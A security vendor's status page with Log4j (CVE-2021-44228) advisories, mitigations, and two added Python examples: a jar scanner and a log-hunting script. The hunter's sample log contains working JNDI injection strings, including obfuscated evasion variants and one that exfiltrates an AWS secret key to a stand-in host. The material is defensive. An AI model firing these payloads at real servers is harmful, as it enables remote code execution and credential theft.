CyFlare System Status Page
Update - Dear Valued Subscriber,

CyFlare has completed a comprehensive audit of its internal and commercial systems, including our SIEM, advanced endpoint, vulnerability scanning, systems management, and SOAR tools. As a result, it is reasonably established that CyFlare is not impacted by the Apache Log4j vulnerabilities identified as CVE-2021-44228 and CVE-2021-45046.

CyFlare does not leverage any of the related components within its applications.

Furthermore, our upstream vendors have provided CyFlare with written statements of no impact. Therefore, there is no remediation required for any CyFlare services at this time. We further validated these statements by conducting internal vulnerability scans and engineering reviews and established that these systems are not affected. We are continuously monitoring the situation and will publish further updates as needed. If you have any questions or concerns, please do not hesitate to reach out to us at socir@cyflare.com.

Thank you,
The CyFlare SOC Team
Jan 4, 18:36 EST
Update - We are continuing to monitor for any further issues.
Dec 14, 13:09 EST
Monitoring - SOC ADVISORY - *** Apache Log4j (CVE-2021-44228) ***

Posted Date: 12-13-21

Published Date: 12-10-21

Sources: CISA, Microsoft

DATE(S) ISSUED: 10-18-21

SUBJECT: Apache Log4j (CVE-2021-44228)

SEVERITY: Critical

BASE CVSS Score: 10.0

OVERVIEW: “The Apache Software Foundation has released a security advisory to address a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1. A remote attacker could exploit this vulnerability to take control of an affected system. Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services.”

THREAT INTELLIGENCE: There are currently no reports of these vulnerabilities being exploited in

SYSTEMS AFFECTED: Apache Log4j 2.0-beta9 through 2.14.1

TECHNICAL SUMMARY: On December 6th, 2021, Apache released Log4j 2.15.0 to address a vulnerability present in versions 2.0-beta9 through 2.14.1. The vulnerability allows remote code execution through JNDI lookups: an attacker who can control log messages or log message parameters can execute arbitrary code loaded from an attacker-controlled LDAP (or other JNDI) server when message lookup substitution is enabled, which it is by default in the affected versions.

The attack targets servers running a vulnerable version of Log4j. The attacker places a JNDI lookup string, of the form ${jndi:ldap://attacker-host/a}, in input the application logs, most commonly an HTTP header such as User-Agent. When Log4j formats the message it interprets the lookup, connects to the attacker's LDAP server, and receives a reference to a remote Java class (or a serialized object), which the JVM then downloads and executes with the privileges of the application. No authentication is required, and the payload does not have to arrive in a header: any attacker-controlled string that ends up in a log line, such as a username, form field or URL parameter, works.

The vulnerability is rated critical. Upgrade every affected Log4j installation to 2.15.0 or later as soon as possible; the Apache security page linked below lists the current fixed release. Note that 2.15.0 was later found to be an incomplete fix (CVE-2021-45046, addressed in 2.16.0), so the latest fixed release is the target, not 2.15.0 specifically.

IOC Repositories:
https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8
https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217

MITIGATIONS/RECOMMENDATIONS: Microsoft recommends immediately applying all security patches relating to this vulnerability. See the CVE entry and the Apache security advisory for details:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228
https://logging.apache.org/log4j/2.x/security.html

The recommended action is to upgrade Log4j from any affected 2.x version to 2.15.0 or the latest fixed release listed on the Apache security page. Where an immediate upgrade is not possible, the following workarounds temporarily reduce exposure.

Log4j 2.10 through 2.14.1: set the system property log4j2.formatMsgNoLookups=true (for example, -Dlog4j2.formatMsgNoLookups=true on the JVM command line) or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true to disable the message lookup feature that is exploited. This setting was later shown to be insufficient on its own (CVE-2021-45046): it does not cover lookups reached through non-default configurations such as a Thread Context Map pattern, so treat it as a stopgap pending an upgrade or removal of the JndiLookup class.

Log4j 2.0-beta9 through 2.10.0, where that property does not exist, should instead have the JndiLookup class removed from the classpath and the application restarted:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

This removal works on every affected 2.x version, not only the older ones, and is the workaround to prefer over the formatMsgNoLookups setting when an upgrade has to wait.
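
The workaround above, and the vulnerability scanning mentioned elsewhere on this page, both come down to two questions per log4j-core jar on a host: which version is it, and is JndiLookup.class still inside it? The following scanner answers both; it is an added example written for this advisory, not CyFlare's scanner or an Apache tool. It walks a directory tree, opens every jar/war/ear (including jars nested inside wars and ears), reads the log4j-core version from Maven's pom.properties, classifies it against the fixed versions on the Apache security page, and reports whether the JndiLookup class is present. The sample tree it scans is constructed in a temporary directory from stand-in jars that carry only the entries the scanner reads.

```python
"""Inventory log4j-core jars and check the JndiLookup workaround (added example, not CyFlare's tool)."""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


@dataclass
class Finding:
    path: str                 # outer file; "!" separates nested archive entries
    version: str
    jndi_class_present: bool
    verdict: str


def version_tuple(version: str) -> Optional[Tuple[int, int, int]]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); unparsable -> None."""
    m = re.match(r"(\d+(?:\.\d+)*)", version)
    if not m:
        return None
    nums = [int(x) for x in m.group(1).split(".")]
    return nums[0], (nums + [0, 0])[1], (nums + [0, 0])[2]


def assess(version: str, jndi_class_present: bool) -> str:
    """Verdict per the Apache security page: 44228 fixed in 2.15.0, 45046 fixed in 2.16.0."""
    v = version_tuple(version)
    if v is None:
        return "unknown version: JndiLookup.class " + ("present, treat as vulnerable" if jndi_class_present else "absent")
    if v[0] < 2:
        return "not-affected: log4j 1.x has no lookups and is not subject to CVE-2021-44228"
    if v >= (2, 16, 0):
        return "fixed: not affected by CVE-2021-44228 or CVE-2021-45046"
    if not jndi_class_present:
        return "mitigated: JndiLookup.class removed; upgrade remains the real fix"
    if v >= (2, 15, 0):
        return "incomplete-fix: 2.15.0 still leaves CVE-2021-45046, upgrade to 2.16.0 or later"
    return "VULNERABLE: CVE-2021-44228, upgrade or remove JndiLookup.class now"


def scan_archive(source, label: str, findings: List[Finding]) -> None:
    """source is a path or file-like object; nested archives are scanned recursively."""
    try:
        zf = zipfile.ZipFile(source)
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_CLASS in names:
            version = "unknown"
            if POM_PROPS in names:
                m = re.search(r"^version=(.+)$", zf.read(POM_PROPS).decode("utf-8", "replace"), re.M)
                if m:
                    version = m.group(1).strip()
            present = JNDI_CLASS in names
            findings.append(Finding(label, version, present, assess(version, present)))
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                scan_archive(io.BytesIO(zf.read(name)), f"{label}!{name}", findings)


def scan_tree(root: str) -> List[Finding]:
    """Scan every archive under root; labels are paths relative to root."""
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                scan_archive(full, os.path.relpath(full, root), findings)
    return findings


def make_log4j_core_jar(version: str, include_jndi: bool) -> bytes:
    """Constructed stand-in for a log4j-core jar: only the entries this scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def build_sample_tree(root: str) -> None:
    """Constructed host: workaround applied on one jar, one fixed jar, one vulnerable jar inside a war."""
    lib = os.path.join(root, "opt", "app", "lib")
    os.makedirs(lib)
    with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(make_log4j_core_jar("2.14.1", include_jndi=False))   # zip -q -d already run
    with open(os.path.join(lib, "log4j-core-2.16.0.jar"), "wb") as f:
        f.write(make_log4j_core_jar("2.16.0", include_jndi=True))    # 2.16 ships the class but disables JNDI
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", make_log4j_core_jar("2.14.1", include_jndi=True))
    with open(os.path.join(root, "opt", "app", "app.war"), "wb") as f:
        f.write(war.getvalue())


def demo() -> Dict[str, str]:
    """Build the sample tree, scan it, and return {path: verdict}."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return {f.path: f.verdict for f in scan_tree(root)}


if __name__ == "__main__":
    for path, verdict in sorted(demo().items()):
        print(f"{path}: {verdict}")
```

Point scan_tree at / (or at the application and container directories) on a real host. The nested-archive recursion matters in practice: the vulnerable copy is usually the one bundled inside a war or a fat jar, not the one sitting in a lib directory, and a scan that only looks at file names will miss it.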

STEPS TAKEN BY CYFLARE: CyFlare has detected exploitation attempts against this vulnerability across several clients and has notified them. Custom ATH rules have been created to detect and alert on behavior related to the vulnerability. Stellar Cyber BDS's threat intelligence sources have also released updated IDS signatures for this vulnerability, and all exploit-attempt detections will alert on events involving "log4j". CyFlare will continue to track the status of this vulnerability and will provide updates and assistance to our clients regarding this matter.
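
The detection described in this section and in the Dec 11 update below (custom alarm rules and threat hunting queries) hinges on recognising the lookup string from the technical summary in logged, attacker-controlled input, while attackers rewrite it to evade a naive "${jndi:" match. The following hunt is an added example written for this advisory; it is not CyFlare's ATH rule, a Stellar Cyber IDS signature, or any vendor's tool. It undoes URL encoding and the nested ${lower:...}, ${upper:...} and ${name:-x} lookups that Log4j itself would resolve, then searches the whole log line rather than one header. The access-log lines are constructed; 198.51.100.0/24 is a documentation address range.

```python
"""Hunt for Log4Shell (CVE-2021-44228) lookup strings in HTTP access logs (added example, not CyFlare's rule)."""
import re
import urllib.parse
from typing import List, Optional, Tuple

# A JNDI lookup once evasions are undone, e.g. ${jndi:ldap://host:1389/a}
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE
)
# ${lower:X} / ${upper:X} evaluate to X; attackers use them to split the word "jndi"
CASE_LOOKUP_RE = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*?)\s*\}", re.IGNORECASE)
# ${name:-X} evaluates to X when the lookup fails, so ${::-j} and ${env:NaN:-j} are just "j"
DEFAULT_VALUE_RE = re.compile(r"\$\{\s*[^${}]*?:-([^${}]*)\}")


def normalize(text: str, rounds: int = 5) -> str:
    """Undo URL encoding and innermost-first lookup tricks until the text stops changing."""
    for _ in range(rounds):
        before = text
        text = urllib.parse.unquote(text)
        text = CASE_LOOKUP_RE.sub(lambda m: m.group(1).lower(), text)
        text = DEFAULT_VALUE_RE.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def extract_jndi_lookup(text: str) -> Optional[str]:
    """Return the de-obfuscated ${jndi:...} expression with balanced braces, or None."""
    norm = normalize(text)
    m = JNDI_RE.search(norm)
    if not m:
        return None
    depth = 0
    for i in range(m.start(), len(norm)):
        if norm[i] == "{":
            depth += 1
        elif norm[i] == "}":
            depth -= 1
            if depth == 0:
                return norm[m.start():i + 1]
    return norm[m.start():]   # unbalanced braces: hand the analyst the tail anyway


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """(line number, decoded lookup) for every line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        lookup = extract_jndi_lookup(line)
        if lookup:
            hits.append((n, lookup))
    return hits


# Constructed Apache combined-format lines: plain payload in User-Agent, URL-encoded payload
# in the query string, case-lookup and default-value evasions, and a credential-exfil variant.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:03:01 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.9 - - [10/Dec/2021:14:03:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}${lower:d}i:${lower:rmi}://198.51.100.7:1099/c}"',
    '10.0.0.9 - - [10/Dec/2021:14:03:20 +0000] "GET / HTTP/1.1" 200 512 "${${env:NaN:-j}ndi:dns://198.51.100.7/d}" "-"',
    '10.0.0.9 - - [10/Dec/2021:14:03:31 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.198.51.100.7/e}"',
    '10.0.0.12 - - [10/Dec/2021:14:04:00 +0000] "GET /docs/${version} HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, lookup in scan_lines(SAMPLE_LOG):
        print(f"line {n}: {lookup}")
```

Run it over web, proxy and application logs rather than only the web tier: the lookup fires wherever the string is eventually logged, which may be a backend service several hops away from the request. A hit is an attempt, not a compromise; the follow-up is to check that host for outbound LDAP/RMI/DNS connections to the address in the decoded lookup.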

SOURCES:
https://logging.apache.org/log4j/2.x/security.html
https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce
Dec 14, 13:09 EST
Monitoring - Dear Subscriber,

Yesterday, 12/10/2021, a critical zero-day vulnerability in Apache Log4j (CVE-2021-44228), a widely used Java logging library, was disclosed. It is being leveraged by attackers in the wild; for now, fortunately, primarily to deliver coin miners.

The SOC is fully engaged in building a comprehensive threat advisory and threat hunting queries, and is working with several clients affected by exploitation attempts observed in their environments.

We will continue to hunt for related Indicators of Compromise throughout client environments and will scan for the vulnerability at clients subscribed to the Vulnerability Management Service.

We can confirm that the Stellar Cyber BDS platform's IDS engine has been updated with new signatures that trigger security detections on exploitation attempts observed in network traffic.

In addition, the CyFlare SOC has built threat hunting queries and a custom alarm (ATH) rule that triggers a security detection on exploit attempts. The rule has been enabled and is operational.

Customers running applications that use Apache Log4j should upgrade to the newest version immediately.

Since the original patch was discovered to be bypassed, and in the interest of layering as many protections against this vulnerability as possible, the following mitigations are also recommended:
• Block suspicious outbound traffic from servers, such as LDAP and RMI, at the firewall (for example in a PANW firewall); the exploit depends on the server reaching back out to the attacker's JNDI endpoint.
• Disable the JNDI lookup:
o Remove the JndiLookup class from the log4j-core jar and restart the service.
o Set spring.jndi.ignore=true.

Reference Links:
https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
https://logging.apache.org/log4j/2.x/security.html
https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/
https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce
https://www.sentinelone.com/blog/cve-2021-44228-staying-secure-apache-log4j-vulnerability/

Should you have any questions or concerns, please place a ticket with the SOC using socir@cyflare.com or call 877.729.3527 extension 2.

Thank you,
Your CyFlare SOC
Dec 11, 16:49 EST
Component Status (past 90 days)
Breach Detection Service: Operational, 100.0% uptime
Rochester SOC Internet & Phones: Operational, 100.0% uptime
CyFlare Support Desk Platform: Operational, 100.0% uptime
Past Incidents
Jan 22, 2022: No incidents reported today.
Jan 8 through Jan 21, 2022: No incidents reported.